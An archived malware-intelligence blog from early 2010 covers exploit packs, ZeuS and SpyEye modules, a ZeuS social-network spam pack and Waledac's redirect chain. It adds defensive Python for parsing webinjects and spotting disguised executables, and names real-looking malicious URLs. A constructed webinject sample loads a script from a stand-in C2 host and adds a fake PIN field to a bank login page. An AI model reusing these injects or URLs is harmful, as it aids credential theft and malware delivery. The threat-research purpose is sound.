MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, computer criminology and information security in general, always from a perspective closely related to the field of intelligence.

28.1.10

The exploitation of vulnerabilities is now one of the most common infection strategies in the crimeware arena. While exploiting weaknesses is not a new concept, the fact is that such actions are increasingly notorious.

In fact, a large number of vulnerabilities, many of them patched more than two years ago, continue to be exploited, especially through exploit packs.

However, when these vulnerabilities are 0-day, the problem is far more serious. A case in point is "Operation Aurora", which has recently been widely discussed and which exploits a 0-day vulnerability in Internet Explorer 6. Yes, you read that right... Internet Explorer 6. It is currently being used to spread malware on a massive scale, and not only through version 6 but also on versions 7 and 8.

The vulnerability is identified as CVE-2010-0249, and as happened with the vulnerability exploited by the Conficker worm (MS08-067), for which exploit creation was automated, a builder has recently surfaced that automates the creation of the exploit for Internet Explorer in the extremely simple manner that is common in such applications.

This application is Chinese and only lets you configure the web address from which the weakness in the browser is exploited. It then generates a file called IE.html containing the exploit code and the URL used for the attack, which is obfuscated.

As a relevant detail, the generated exploit (embedded in the HTML) is detected by fewer than 40% of the antivirus engines reporting to VirusTotal, while the builder itself is detected by only about 25%.

On the other hand, exploit automation exposes a gap, revealing that many operations "disguised" as simple attacks, as part of a campaign of distraction, are closely related to intelligence matters.

In light of all the recent financial trojans, here are two examples of what ZeuS bots have modules for. These modules record form data and keystrokes from users logging into Bank of America and PayPal. Both screenshots are examples of the capabilities of the newer ZeuS bots out there.

This, together with keylogging, opens the bank vault for these organized groups operating around the world. This is the gateway that enables them to wire-transfer your money to money-mule networks and back to themselves.

The features shown here, along with the keylogging data transmitted back to the C&Cs, open many doors for espionage. These trojans open the floodgates.

To see examples of what they and others have done, see Brian Krebs' blog, which covers, among other things, Remote Access Trojans (RATs) and online bank theft.

27.1.10

SpyEye, a bot whose first release was on January 2 of this year, is a "fresh" piece of malware with interesting features and considerably fast development, being at version 1.0.65 at the moment.

It is written almost entirely in C++, and the binary is approximately 60 KB in size.
It works from Windows 2000 to Windows 7 and runs in ring 3 (something that possibly makes it detectable by tools like GMER).

Something really interesting here is that, at the date of its first release, the detection rate was basically zero. The price of this bot (base bundle) is USD 500, and some of the features it has at the moment are:

According to the author, the product is very stable and has a permanence rate of 30%.
As we can see, this industry is in a constant process of growth and sophistication, something that, after all, is very alarming.

25.1.10

We were able to analyze a pack that turns ZeuS zombies into spammers on social networks. Specifically, the module analyzed was developed for use on Vkontakte.ru, the Russian clone of Facebook.

This crimeware was created by someone calling himself Deex of Freedomscripts Team and is sold for the modest price of USD 100 (via WebMoney).

The pack includes several configuration files, which make it up:

config.ini: defines the target (friends or online, although so far only the first option seems to work) and the password for the administration control panel. When friends is selected, messages are sent to all of the victim's contacts, even those who are not online at that time.

message.txt: contains the text of the message to send.

title.txt: contains the title of the message to send.

results.txt: keeps the statistics of infected users (Vkontakte identifier, IP and number of messages sent).

The contents of that file should be added to (or completely replace) the file of the same name required to build the ZeuS binaries, after which the ZeuS configuration file and executable are rebuilt.

Once the victim's PC is infected with this executable, in addition to sending the typical ZeuS reports, it checks the pages visited, and if the page belongs to Vkontakte.ru and is in English (it does not work in other languages), it activates the code injection into the page, which always keeps an authentic appearance.

From that moment, all requests are processed by the HTML page handled by getconfig.php, which then calls the real page to avoid suspicion, showing the user the actual content as they browse vkontakte.ru; meanwhile, in the background, a message is sent every time the user clicks a link, via the page js.php, as seen in the following log snippet:

The result can be seen in the sent items folder, where all the messages that have been sent to our contacts appear:

All this is managed from a control panel independent of ZeuS, which requires no database to run, since configuration and reporting are kept in separate text files.

The control panel is simple enough. It has a blank login page with a box for the password that gives access to the panel itself, with a menu of 5 options:

Reports: shows the results of the spam sending. In our example, the ID has sent 20 messages from the specified IP.

Inject: shows the injected code (webinjects.txt) and links to the three pages responsible for performing the sending tasks.

Settings: from here you can manage the configuration files to change the password and set the title and body of the message to send. This data is stored in the configuration files mentioned above.

Help: a brief page with some indication of what this pack is and its two component parts: Inject and Admin.

Logout: exits the control panel.
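The injection the Inject page shows is driven by a webinjects.txt in the usual ZeuS format (set_url masks followed by data_before / data_after / data_inject blocks, each closed by data_end). The following parser is an added example written for this page, not code from the pack or from ZeuS: it reads such a file, converts each set_url mask into a pattern an analyst can match observed URLs against, and lists the external script sources the injects pull in, which is the most directly useful detection data recoverable from a seized configuration. The sample webinjects.txt content and the host name EXAMPLE-C2.invalid are constructed for illustration.

```python
"""Parse a ZeuS-style webinjects.txt and derive detection data from it.

Added example for this post, not the pack's own code. Only the file
keywords (set_url, data_before, data_after, data_inject, data_end) and the
G/P/L flag letters reflect the real format; the sample below is constructed.
"""
import re
from dataclasses import dataclass

# Constructed sample: one inject for vkontakte.ru, one for a made-up bank host.
SAMPLE_WEBINJECTS = """\
set_url http://vkontakte.ru/* GP
data_before
</head>
data_end
data_after

data_end
data_inject
<script src="http://EXAMPLE-C2.invalid/js.php"></script>
data_end

set_url https://*.example-bank.test/login* GPL
data_before
<input*name="pass"*>
data_end
data_after

data_end
data_inject
<input type="text" name="pin"> PIN:
data_end
"""


@dataclass
class Inject:
    url_mask: str   # set_url mask, '*' is a wildcard
    flags: str      # G = GET, P = POST, L = log the request, D = disabled
    before: str = ""
    after: str = ""
    inject: str = ""


def parse_webinjects(text):
    """Return one Inject record per set_url entry in a webinjects.txt body."""
    entries = []
    current = None   # entry currently being filled
    section = None   # which data_* block we are inside, if any
    buf = []
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        if line.startswith("set_url"):
            parts = line.split()
            current = Inject(url_mask=parts[1], flags=parts[2] if len(parts) > 2 else "")
            entries.append(current)
        elif line.strip() in ("data_before", "data_after", "data_inject"):
            section = line.strip()
            buf = []
        elif line.strip() == "data_end" and current is not None and section:
            # Store the block under the attribute named after it (before/after/inject).
            setattr(current, section.replace("data_", ""), "\n".join(buf))
            section = None
        elif section is not None:
            buf.append(line)
    return entries


def mask_to_regex(mask):
    """Turn a set_url mask into an anchored, case-insensitive regex ('*' = any text)."""
    pattern = "".join(".*" if c == "*" else re.escape(c) for c in mask)
    return re.compile("^" + pattern + "$", re.IGNORECASE)


def matching_injects(entries, url):
    """Injects that would fire for the given URL: tells you whether a site is targeted."""
    return [e for e in entries if mask_to_regex(e.url_mask).match(url)]


def external_script_sources(entries):
    """src= URLs inside injected content; these point at the attacker's pages (here js.php)."""
    srcs = set()
    for e in entries:
        srcs.update(re.findall(r'src=["\']([^"\']+)["\']', e.inject))
    return sorted(srcs)


if __name__ == "__main__":
    injects = parse_webinjects(SAMPLE_WEBINJECTS)
    for i in injects:
        print(i.url_mask, i.flags)
    print("targeted:", [i.flags for i in matching_injects(injects, "http://vkontakte.ru/mail.php")])
    print("script sources:", external_script_sources(injects))
```

Running it against a recovered configuration gives the list of targeted URL masks and the script hosts to block or alert on; the regex form of each mask can be dropped straight into a proxy or IDS rule.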

In short, this package demonstrates how easy it is to take advantage of zombies belonging to a botnet under ZeuS control for sending messages through social networks.

Although this case concerns, in the first instance, only Vkontakte.ru, adapting it to other social networks or using it for other attacks through web pages, such as click fraud, would be fairly easy.

18.1.10

As many readers know, at Malware Intelligence we have been researching the direct implications of this whole new generation of malicious code and the criminal activity that daily feeds the crimeware business.

Under this premise, our researchers have focused their efforts on trying to reveal the different branches that are entangled with each other in a web of illegal actions aimed mainly at taking money from users through unethical techniques. And given all this... are there still doubts that we are facing a big business that profits through illegal activities? (obviously, always according to the laws of each country). I think the unanimous answer is NO.

Having made this assessment after exposing content on the state of the art of crimeware, including relevant data not yet published so as not to hamper ongoing investigations, it has become common to receive messages and comments, mostly aggressive, from those responsible for the development or commercialization of certain crimeware applications.

Under this scenario, and although I do not usually give explanations about the research we perform, this time I will make an exception and expose two of the latest comments we have received from those who are part of the crimeware business.

The first case is an anonymous, non-aggressive comment that I personally must confess I found... very nice :) It was left by one of the Partners who market the crimeware YES Exploit System. The comment was made on the article that talks about this exploit pack, where my answer can also be found. The comment is as follows:

"YES, We are the blackhats :) Thanks for small review, but why do ppl think that blackhats are poor guyz? It's just a business, no less, no more :) Do you wanna buy our excellent product? - there is discounts for you ;)"

As my "friends" say, to them it is "just a business, no more, no less." However, let us agree that, besides not being a conventional business, it represents a business model that directly and actively collaborates with criminal activities, which isn't so funny.

Now, YES Exploit System is a crimeware development with a considerable amount of code behind it and a market value of USD 800. And the funny thing (as in the last sentence of the comment) is knowing that I will not get any discount on crimeware ;)

The second case I want to present is a bit more aggressive. It concerns what was written in the report on the Russian service for testing malware detection, where the comment and my response can be read; I do not transcribe the latter here because of its length. The message reads:

"In summary, further evidence that not only the exploitation of malware generates profits but also moves parallel money on services to this industry. And in some cases like the present one, have to see if you can consider this service as a criminal act or not."
Wow and why would this service be criminal act?

It's clear to me that someone has a year work in a software like this scanner and he want to make money with it. If you don't like it don't use it. Noone forces you to pay for it or submit files there but since I see you are a little wanker blogger who does not respect others work I giving it to you straight.

You have no inside experience in the antivirus industry whatsoever otherwise you would know that VirusTotal distributes 200K files/day to antivirus companies for FREE. AV companies are shit on online scanners, they wouldn't even contact you if you would ask them about file distribution and they definitely wouldn't support an online scanner so what else can these services do to remain online?

Before you criticizing others work put something down on the table little frustrated shit..."

Regardless of the aggressive tone of this second case, what is interesting is who it comes from: someone who uses the nickname "KLESK" and hosts a completely unlawful "attempt at a business", on whose page one of the first things we read is "Selling corporate data, trade secrets".

"We sell corporate data and trade secrets", the advertisement continues. It goes on to clarify what type of information is supposedly "stolen" from companies, and tops it off with something very interesting:

In sum, this latter case in particular represents a good opportunity to analyze the psychology of a would-be cyber-criminal whose attempt to "negotiate" not only leaves much to be desired but cannot even be rated as a candidate to be considered an object of research.

16.1.10

Undoubtedly, the business that crimeware currently represents expands every day. This is reflected not only in the professionalization of the development and operation of the various computer applications and technologies used to commit crimes and attacks via the web, but also in the sales strategies used to attract the attention of a greater volume of restless minds who make money by stealing from others on a business foundation: a botnet.

While some 90% of crimeware sales still take place in an underground environment where the offer is made directly by the creator of the crimeware, cyber-criminals are taking their business to a "clearer" and "higher" underground level, publicizing their developments through websites designed exclusively to offer their "services", but through "business partners" who ensure the logistics of each case.

In early 2009 we mentioned the case of the web-based sale of Unique Sploit Pack, one of the general-purpose exploit packs currently most in demand, whose commerce website was online for a while until it was taken down precisely because it is crimeware.

However, this marketing strategy has once again come to the fore with YES Exploit Pack, one of the most active crimeware today.

Under the slogan "Improve your business with YES Exploit System. Exploit Pack from Russia", version 2 of this exploit pack is offered for sale through a website registered in Russia.

The propaganda campaign (marketing strategy) of the website consists of briefly explaining the salient features of the crimeware, by way of justifying why it is better than other packages of its style (the competition). It costs USD 800 and the transaction is carried out, as is typical, via WebMoney.

9.1.10

This is the first release of a particular-purpose exploit pack for monitoring botnets called Napoleon Sploit, which was launched on the crimeware underground market in August 2009.

Due to its immaturity and low status as a "complex Exploit Pack" compared with others of its style, it is low cost and in fact had no impact on the underground sales circuit, although it is still for sale at a cost of USD 299, with important updates obtainable for an additional USD 35.

As we see in the image, its interface is very simple and minimalist. It has only two modules (statistics and configuration) plus the authentication panel (login via web), and according to its author, the light color style of the crimeware is designed not to cause eye fatigue for the cybercriminals, its "future clients".

(No words, but I expect opinions on this.) The following image belongs to the control panel.

The exploit pack is designed to exploit specific vulnerabilities via the following exploits:

MDAC - IE5, IE6

Opera Telnet - Opera 9.00 - 9.27

PDF Util.Printf - PDF Adobe Reader 8.1.2

PDF Collab.Geticon, PDF Util.Printf - Adobe Reader & Acrobat > 8.1.2

One detail I cannot pass over is that this crimeware is the ancestor of Siberia Exploit Pack, another particular-purpose web application developed by the same author as Napoleon Sploit, and which is In-The-Wild.

5.1.10

"Crimeware in 2009" presents in one document everything that was channeled through this blog during the year in question on crimeware and associated hazards.

It has a total of 262 pages and is divided by the most relevant topics describing the criminal activities that were a source of news on this blog. It has two indices: one for locating the news simply (contents) and another for the images (image index).

4.1.10

Since the launch of its first version in June 2009, Eleonore Exploit Pack has had a major impact in the criminal field, both from the demand for the exploit pack because of its competitive cost compared to similar web applications, and from its high rate of activity.

It currently has a repertoire of 6 (six) versions, the latest being 1.3.2, which recently appeared on the underground scene at a cost of USD 1000.

This means that its author, ExManoize, updated the package approximately every month, giving a concrete idea of the effort put into its development, which obviously is not out of vocation but is part of the fraudulent business, collaborating in the creation and maintenance of one of the "tools" used in the criminal field.

The structure of this crimeware is quite complex, and it has a repertoire of 13 (thirteen) exploits included in the package by default, which are:

MDAC for MSIE

MS009-02 for MSIE

ActiveX pack, works in MSIE

compareTo for Firefox

JNO (JS navigator Object Code) for Firefox

MS06-006 for Firefox

Font tags for Firefox

Telnet for Opera

PDF collab.getIcon for all browsers

PDF Util.Printf for all browsers

PDF collab.collectEmailInfo for all browsers

PDF Doc.media.newPlayer for all browsers

Java calendar for all browsers

Obviously, like any service offered in a market model, and crimeware is one of them, the "provider" secures support, updates and cleanup of the package if necessary. All business!

From a historical standpoint, the Eleonore Exploit Pack updates are:

In June 2009, Eleonore Exploit Pack v1.0 went on sale to the public, containing the MDAC, MS009-02, Snapshot, Telnet (for Opera), PDF collab.getIcon, PDF Util.Printf and PDF collab.collectEmailInfo exploits. Its initial price was USD 599.

In July 2009 it was updated to version 1.1, adding two more exploits: Font tags, which targets Firefox 3.5, and DirectX DirectShow, which targets IE 6 and 7. There were also improvements in script encryption. Its price was USD 500, and the previous version dropped in price to USD 300.

During the same month of July, the Spreadsheet exploit was added, the PDF files were changed, image capture was eliminated, and the ability to upload a file through the admin panel itself was added. This version is called 1.2 and its cost was set at USD 700.

After a period of three months without updates, version 1.3 appeared in October, incorporating more features into the fraudulent package. Among them, some "improvements" to the exploits for Internet Explorer and the addition of Java D&E. The cost of this version was USD 1000.

In November, marketing of version 1.3.1 began, which continued to refine the exploits and, among other things, added a Robots.txt file to handle indexing and prevent certain folders from being displayed. The price remained at USD 1000.

On December 16 the latest version, 1.3.2, appeared, adding Java calendar and an exploit for a recent PDF vulnerability, Doc.media.newPlayer, which until then was a 0-day. Its price was unchanged.

From the standpoint of the businessman, the infrastructure for running the botnet business is assembled and put into operation on a dedicated server, which can also be hired. However, zombies are needed to obtain the economic benefit, because without them the fraudulent schemes for which these packages are designed could not do their job. In fact, the fairly regular updating of the package demonstrates that the profits obtained through these activities are significant.

Moreover, regardless of the cost of the crimeware, there are "extra services" offered by the developer which are not included in the original package, for example cleaning of the botnet at a cost of USD 50, or changing the malicious domain for the same price, USD 50.

Alternatively, botmasters (not necessarily the web application developers) often rent out their botnet partially, and in the case of Eleonore Exploit Pack v1.3.2, the rent is USD 40 per day.

3.1.10

The business models offered by cloud computing are not new. Many of the services currently offered under this banner follow a model established long ago in the market.

However, the concept of Cloud Computing as we know it today responds to a strong orientation towards generating business by leveraging the Internet as infrastructure, which in a highly competitive market enjoys certain advantages over conventional business.

Under this scenario, the fact is that this way of creating business was also accepted and implemented by those who profit daily through a battery of programs designed for fraudulent purposes, which, when offered over the Internet, receive the name Crimeware-as-a-Service, or by its acronym CaaS.

Fraudulent services are beginning to take shape that seek to automate the handling of malware in processes created solely to evade detection. An example is the service (which no longer exists) called PoisonIvy Polymorphic Online Builder, designed to encrypt malware, which we discussed at the time. In this case, since it handles only malicious code, the service falls under the term Malware-as-a-Service (MaaS).

Similarly, there are currently services developed for profit and intended to feed the crimeware business through mechanisms for verifying the effectiveness of malware against antivirus scan engines.

These services are the antithesis of others widely used by security professionals, such as VirusTotal from the Spanish company Hispasec. We have also spoken about one of them, called VirTest.

However, there are others such as Private antivirus service (established in 2008), which like VirTest is of Russian origin and seeks financial gain through a paid service, but also collaborates with the cyber-crime environment by offering the possibility of checking the detection rate of newly created malware at a given moment, while also ensuring that the binary will not be shared with antivirus companies. Thus, anonymity is assured along with a longer life cycle for the threat.

The fraudulent service verifies the effectiveness of malware against 17 well-known antivirus engines on the anti-malware market, and as displayed in the first screenshot, there are three prices depending on the characteristics of the service "contracted":

USD 0.2 per check

USD 15 for a limit of 10 checks per day

USD 20 for unlimited checks

Once inside the system, from the AV check tab, the binaries are uploaded to be submitted to the antivirus scan; the report is then provided along with a history of uploads. These options are found in the lower left corner.

An interesting aspect of this crimeware service is the ability to schedule verification tasks, through the second tab, called Scheduler.

This option allows, on the one hand, uploading a malicious file from the malware creator's hard drive and, on the other, selecting malware that is already present in the propagation circuit via its URL, i.e. the cyber-crooks can verify and monitor the detection of malicious code that is already spreading.

In this way, through the "scheduler", the checking frequency of the uploaded malicious code is scheduled based on a set of parameters chosen from a fixed set of time intervals: 3, 6 or 12 hours, or 1 or 3 days.

These parameters are configurable and, once established, can be viewed in a table shown in the same window. The third column corresponds to the time interval. It also configures how the report notification is delivered, which may be by email or via ICQ.

Clearly, these options are designed with the speed of malware propagation in mind, checking in the shortest interval, every 3 hours, whether the threat is detected by antivirus companies. This allows the malware to be changed whenever necessary, and the service to be combined with others, such as the "service" referred to above for encrypting files.

Obviously, those who are part of the criminal chain of the crimeware business work together through different alternatives, also forming a side business that in turn feeds on criminal activities.

2.1.10

The Waledac trojan, in charge of recruiting zombies for a botnet dedicated to feeding spam, recently made news again using the new year 2010 as a pretext.

However, its fraudulent activities date from 2007, when it was known under the name Storm, and since then this malware family has taken advantage of social engineering as its main propagation strategy under different covers.

This timeline extends from the first social engineering activities to the latest and most recently known, related to the beginning of 2010.

1.1.10

After a long period of inactivity, the Waledac botnet once again deploys an infection strategy using the pattern that characterizes it: social engineering, this time taking advantage of the beginning of the new year as cover.

The latest Waledac campaigns date from the middle of the year, when the propagation strategy used pretended to be a video about Independence Day in the U.S., hosted on YouTube. In fact, the most important activity this year came during the first quarter.

Here we see screenshots describing the Waledac timeline of its activities during 2009.

However, those behind Waledac never stopped, and the registration dates of the domains recently used fall throughout the period of supposed inactivity.

Each page used for propagation has an obfuscated script with instructions to be executed automatically on the victim machine. Thus, it exploits a weakness and automatically downloads and executes the malware, turning the computer into a node of the botnet to continue its activities. Below we see a screenshot of the script.

Inside the script is a reference to the counter.php file, which hosts another script from which it jumps to http://diokxbgrqkgg.com/ld/trest1/ and from there to http://diokxbgrqkgg.com/nte/trest1.py, where there is another malicious script.

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.$.........y.=u..=u..=u...u..u..
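The dump above is the tell-tale start of a Windows executable (the "MZ" DOS header and its "This program cannot be run in DOS mode" stub) being served from a URL that ends in .py. The following is an added example, not code from the original post: it inspects the first bytes of a fetched body for the MZ header, follows the e_lfanew pointer at offset 0x3C to the "PE\0\0" signature, and flags the case where a URL or Content-Type claims text or script while the body is a PE. The sample bytes are constructed to have that shape (they are not a runnable program and not the real Waledac binary), and the host name example.invalid is a placeholder.

```python
"""Spot a PE executable delivered from a script-looking URL.

Added example for this post, not the post's own code. The PE header
offsets used (MZ at 0, e_lfanew at 0x3C, "PE\\0\\0" then the Machine
field) are the standard PE layout; the sample bytes are constructed.
"""
import struct
from urllib.parse import urlparse

# Standard IMAGE_FILE_MACHINE values for the few architectures we report by name.
PE_MACHINE = {0x014C: "x86", 0x8664: "x64", 0x01C0: "ARM", 0xAA64: "ARM64"}

# URL suffixes and media types that promise text, not a binary.
SCRIPT_EXTENSIONS = (".py", ".php", ".js", ".html", ".htm", ".txt")


def build_sample_pe(machine=0x014C, e_lfanew=0x80):
    """Construct a minimal PE-shaped byte string for testing (constructed, not a real file)."""
    dos_stub = b"This program cannot be run in DOS mode.\r\r\n$"
    hdr = bytearray(e_lfanew + 24)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = struct.pack("<I", e_lfanew)        # e_lfanew -> PE signature offset
    hdr[0x40:0x40 + len(dos_stub)] = dos_stub           # DOS stub text, as in the dump above
    hdr[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    hdr[e_lfanew + 4:e_lfanew + 6] = struct.pack("<H", machine)  # IMAGE_FILE_HEADER.Machine
    return bytes(hdr)


def inspect_pe(data):
    """Return header evidence found in data, or None if it does not start like a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    info = {
        "dos_header": True,
        "pe_signature": False,
        "machine": None,
        "dos_stub_text": b"This program cannot be run in DOS mode" in data[:e_lfanew or 0x200],
    }
    # e_lfanew must land inside the buffer with room for the signature and Machine field;
    # a truncated or corrupted header simply reports no PE signature.
    if 0x40 <= e_lfanew <= len(data) - 6 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
        info["pe_signature"] = True
        machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
        info["machine"] = PE_MACHINE.get(machine, hex(machine))
    return info


def classify_download(url, body, content_type=""):
    """'pe-disguised-as-text' when the URL or Content-Type claims text but the body is a PE."""
    pe = inspect_pe(body)
    if pe is None:
        return "not-pe"
    path = urlparse(url).path.lower()
    claims_text = path.endswith(SCRIPT_EXTENSIONS) or content_type.lower().startswith("text/")
    return "pe-disguised-as-text" if claims_text else "pe"


if __name__ == "__main__":
    sample = build_sample_pe()
    print(inspect_pe(sample))
    print(classify_download("http://example.invalid/nte/trest1.py", sample))
```

In a proxy log review or sandbox pipeline, the same check applied to the first few hundred bytes of each response catches the "script URL, executable body" pattern this campaign relies on without needing a signature for the specific sample.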

Waledac is back with a new excuse, but judging by the percentage of activity on the server where it is hosted, it appears that it always remained dormant with very sporadic activity. Even taking into account the folder structure from which the download is made, it seems to have a direct relationship with another well-known threat, Bredolab, which is apparently also associated with some scareware and ZeuS.